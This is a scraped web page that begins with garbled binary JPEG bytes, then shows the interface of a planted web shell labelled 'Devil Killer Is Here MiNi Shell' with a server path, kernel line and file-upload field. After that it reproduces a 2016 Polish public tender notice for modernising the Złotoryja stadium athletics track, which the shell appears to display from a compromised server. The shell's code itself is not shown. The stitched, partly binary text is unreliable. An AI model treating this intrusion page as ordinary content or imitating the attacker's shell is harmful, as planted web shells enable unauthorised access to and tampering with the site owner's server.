JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160720/146197-N-2016.html

<p class="kh_header"><b>Złotoryja: Modernizacja kompleksu lekkoatletycznego na stadionie sportowym w Złotoryi  przy ul. Sportowej 7, wariant - 400 m certyfikowany, w ramach  Programu Rozwoju Infrastruktury Lekkoatletycznej - Budowa z przebudową bieżni wraz z urządzeniami i infrastrukturą towarzyszącą na terenie miejskiego wielofunkcyjnego stadionu sportowego w Złotoryi</b><br>
<b>Numer ogłoszenia: 146197 - 2016; data zamieszczenia: 20.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Złotoryja , Pl. Orląt Lwowskich 1, 59-500 Złotoryja, woj. dolnośląskie, tel. 076 8779138, faks 076 8783120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotoryja.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja kompleksu lekkoatletycznego na stadionie sportowym w Złotoryi  przy ul. Sportowej 7, wariant - 400 m certyfikowany, w ramach  Programu Rozwoju Infrastruktury Lekkoatletycznej - Budowa z przebudową bieżni wraz z urządzeniami i infrastrukturą towarzyszącą na terenie miejskiego wielofunkcyjnego stadionu sportowego w Złotoryi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1.	prace przygotowawcze, rozbiórkowe,
2.	roboty ziemne
3.	budowa 400 m. bieżni lekkoatletycznej z czterema torami okrężnymi i sześcioma torami prostymi do biegów sprinterskich - powierzchnia nawierzchni syntetycznej bieżni wraz z zakolem wg projektu (z umieszczeniem w nich większości urządzeń lekkoatletycznych tj. skocznia do skoku wzwyż, rzutnia do rzutów oszczepem, skocznia do skoku w dali i trójskoku 
( powierzchnia zeskoczni 44,0 m2), skocznia do skoku o tyczce)  łącznie 4 154,4 m2
4.	budowa zakola zachodniego z nawierzchni z trawy naturalnej boiska piłkarskiego 8 689,5 m2, w którym umieszczona zostanie rzutnia oszczepem z rozbiegiem z nawierzchnią syntetyczną, rzutnia do pchnięcia kulą z nawierzchnią trawiastą , rzutnia do pchnięcia kulą z nawierzchnią z mączki ceglanej i rzutnia do rzutów dyskiem i młotem ( powierzchnia sektora rzutów z mączki ceglanej rzutni do pchnięcia kuli - 147,7 m2);
5.	wykonanie trybun na łączną ilość wykonanie trybun na łączną ilość 200 miejsc siedzących 
( obiekt nr 9 i 10 rys. 01 PZT) 
6.	wykonanie nawierzchni z trawy naturalnej sianej na skarpach ( 1150 m2)
7.	nawierzchnie z kostki betonowej ( gr. 6 cm. - 210,0 m2; gr. 8 cm.- 2093,0 m2), obrzeża betonowe, krawężniki, droga z nawierzchnią mineralną - powierzchnia utwardzona ciągów pieszo-jezdnych - 1295,0 m 2, schody terenowe
8.	ogrodzenie terenu (wys. 2,25 m), ogrodzenie wewnętrzne bieżni lekkoatletycznej 
9.	( wys. 1,20 m)
10.	wyposażenie boiska: profesjonalne bramki do piłki nożnej pełnowymiarowe 
( 7,32 m x 2,44 m), tuleje do bramek; maszty odciągowe do siatki; siatki do bramek; chorągiewki narożne; profesjonalny wózek do malowania linii boisk za pomocą farby ekologicznej;
11.	branża elektryczna - przebudowa, okablowanie, oświetlenie, zasilanie;
12.	branża sanitarna - kanalizacja deszczowa, odwodnienie, drenaż, instalacja zraszania płyty boiska;
13.	przebudowa zaplecza sanitarno-szatniowego;
14.	zakup i montaż sprzętu lekkoatletycznego; wyposażenie boiska; stanowisko dla sędziów
i komentatora
Szczegółowy zakres robót do wykonania został określony w dokumentacji projektowej 
oraz specyfikacji technicznej wykonania i odbioru robót.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.21.22.00-8, 45.23.31.20-6, 45.31.00.00-3, 45.33.00.00-9, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.01.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM
1.	Zamawiająca żąda od Wykonawcy wniesienia wadium w wysokości: 50 000,00 złotych (słownie: pięćdziesiąt tysięcy złotych, 00/100 groszy)
Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych, tj.:
-	w pieniądzu,
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych, 
-	w gwarancjach ubezpieczeniowych, 
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
( tj Dz.U. 2016 nr 0 poz. 359 ).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
NR 20 8658 0009 0000 3506 2000 0020
Wadium wnoszone w innej formie niż w pieniądzu (oryginał dokumentu) należy zdeponować 
w sekretariacie Urzędu Miejskiego w Złotoryi, Pl. Orląt Lwowskich 1, 59-500 Złotoryja, pok. 9.
2.	Wykonawca, który nie wniesie wadium na okres związania ofertą zostanie przez Zamawiającą wykluczony z postępowania.
3.	Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.	Zamawiająca zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis udokumentowania tego warunku:
1.	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
- potwierdzenia spełniania tego warunku Zamawiająca dokona na podstawie dokumentu wymienionego w pkt VI.A pkt. 2 SIWZ oraz oświadczenia wymienionego w pkt VI. pkt. 1 ppkt 1.1. SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie zgodnie z zasadami sztuki budowlanej                        i prawidłowe ukończenie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a)	przynajmniej dwóch robót budowlanych polegających na wykonaniu okrężnej bieżni lekkoatletycznej, w tym co najmniej jednej  bieżni lekkoatletycznej  o długości 400 m. z czterema torami okrężnymi i sześcioma torami na prostej sprinterskiej,  a wartość zadania wyniosła co najmniej 1 600 000,00 PLN brutto oraz
b)	przynajmniej dwóch robót budowlanych polegających na wykonaniu pełnowymiarowego boiska piłkarskiego z trawy naturalnej o powierzchni co najmniej 6 400 m2, a wartość zadania wyniosła co najmniej 1 000 000,00 PLN brutto dla każdego z nich.

- 	potwierdzenia spełniania tego warunku Zamawiająca dokona na podstawie poświadczenia wymienionego w pkt VI. pkt 1 ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. pkt 1 ppkt 1.2. SIWZ;

Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnianiu warunku, tj. liczba robót budowlanych, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiająca nie wymaga przedłożenia takiej informacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest dysponowanie wykwalifikowaną kadrą, niezbędną do kierowania robotami będącymi przedmiotem zamówienia. Osoby wyznaczone do kierowania robotami w poszczególnych branżach muszą posiadać wymagane uprawnienia i doświadczenie w kierowaniu robotami w swojej branży, tj.:
a)	Kierownik budowy musi posiadać:
-	minimum 5 letnie doświadczenie jako kierownik budowy,
-	wymagane uprawnienia o specjalności konstrukcyjno-budowlanej bez ograniczeń,
b)	Kierownik robót budowlanych musi posiadać:
-	minimum 3 letnie doświadczenie jako kierownik robót budowlanych,
-	wymagane uprawnienia o specjalności konstrukcyjno-budowlanej bez ograniczeń,
Zamawiająca informuje, że funkcje kierownika budowy i kierownika robót budowlanych może pełnić ta sama osoba, pod warunkiem spełnienia wymagań określonych dla osób wymienionych w pkt a) i b).
c)	Kierownik robót sanitarnych musi posiadać:
-	minimum 3 letnie doświadczenie jako kierownik robót sanitarnych,
-	wymagane uprawnienia budowlane o specjalności instalacyjnej w zakresie sieci, instalacji                    i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
d)	Kierownik robót elektrycznych musi posiadać:
-	minimum 3 letnie doświadczenie jako kierownik robót elektrycznych,
-	wymagane uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji                i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.

Wydanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie nabytych 
w państwach członkowskich UE oraz wpis do stosownej izby odbywa się po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego 
w Polsce na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 nr 0 poz. 65.).

- 	potwierdzenia spełniania tego warunku Zamawiająca dokona na podstawie oświadczenia wymienionego w pkt VI. pkt. 1 ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. pkt 1 ppkt 1.3. i 1.4. SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(1)	Warunkiem udziału w postępowaniu jest posiadanie środków finansowych lub zdolności kredytowej  w wysokości co najmniej 2 500 000,00  zł.
(2)	Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnianiu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
(3)	Wartości potwierdzające spełnianie warunku podane w dokumentach w walutach innych niż wskazane przez Zamawiającą należy przeliczyć wg średniego kursu NBP na dzień wystawienia dokumentu, podając datę i kurs.
(4)	potwierdzenia spełniania tego warunku Zamawiająca dokona na podstawie oświadczenia wymienionego w pkt VI. pkt.1 ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. pkt.1 ppkt 1.5. SIWZ, 
(5)	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI.pkt 1. SIWZ, metodą spełnia / nie spełnia.
(6)	Warunki udziału, o których mowa w art. 22 ust. 1 ustawy oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności wykonawcy do należytego wykonania udzielanego zamówienia.

UWAGA:
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy 
i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go 
z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającej, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b, odpowiada solidarnie 
z Wykonawcą za szkodę Zamawiającej powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Aktualny certyfikat  IAAF Product Certificate  dla oferowanej nawierzchni o wymaganej grubości  na  bieżnię; b) Badania na zgodność z normą PN EN 14877:2014-02 (lub rekomendację techniczną Instytutu Techniki Budowlanej lub wyniki badań specjalistycznego laboratorium akredytowanego przez IAAF, potwierdzające parametry oferowanej nawierzchni podane w ppkt. a). c) Badania potwierdzające zgodność proponowanej nawierzchni z wymaganiami  IAAF, wydane przez jednostkę akredytowaną przez IAAF; d) Atest Państwowego Zakładu Higieny lub równoważnej instytucji z państwa członkowskiego Unii Europejskiej EFTA; e) Autoryzacja producenta oferowanej nawierzchni sportowej wydana wykonawcy i dotycząca przedmiotowego zadania wraz z potwierdzeniem gwarancji.; f) Karta techniczna oferowanego systemu zawierająca opis technologii wykonania wraz z podaniem norm zużycia komponentów oraz pokazująca parametry oferowanej nawierzchni.; g) Certyfikaty IAAF Class 2 dla dwóch obiektów wykonanych z oferowanego systemu nawierzchniowego odpowiadającego ww parametrom wyszczególnionym w tabeli.
Parametry techniczne mieszczące się w przedziałach, które ma spełniać nawierzchnia poliuretanowa typu SANDWICH: grubość nawierzchni musi być zawarta w przedziale 13-14 mm, taka jaka jest w certyfikacie IAAF dla takiej nawierzchni; wydłużenie względne przy zerwaniu: 53-60 procent; odkształcenie pionowe w temp. 23 st. C:  1,80-2,0 mm; tarcie TRRL                                                 :  60-65; tłumienie energii w temp. 23 st. C: 35-39 procent

lub 
h) Aktualny certyfikat IAAF  Product Certificate dla oferowanej nawierzchni o wymaganej grubości na bieżnię; i) Badania na zgodność z normą PNEN 14877:2014-02 lub rekomendację techniczną Instytutu Techniki Budowlanej lub wyniki badań specjalistycznego laboratorium akredytowanego przez IAAF, potwierdzające parametry oferowanej nawierzchni; j) Badania potwierdzające zgodność proponowanej nawierzchni z wymaganiami IAAF, wydane przez  jednostkę akredytowaną przez IAAF.; k)Sprawozdanie z wyników badań potwierdzających bezpieczeństwo ekologiczne na zgodność DIN V 18035-6 oferowanej syntetycznej nawierzchni sportowej, w tym zawartość substancji szkodliwych  (między innymi metali ciężkich), wydane przez akredytowane laboratorium; l) Aktualne badania na normę EN PN 13501 określające wymaganą klasyfikację ogniową; m) Atest Państwowego Zakładu Higieny lub równoważnej instytucji z państwa członkowskiego UE-EFTA; n) Autoryzacja producenta oferowanej nawierzchni sportowej wydana wykonawcy i dotycząca przedmiotowego zadania wraz z potwierdzeniem gwarancji; o) Karta techniczna 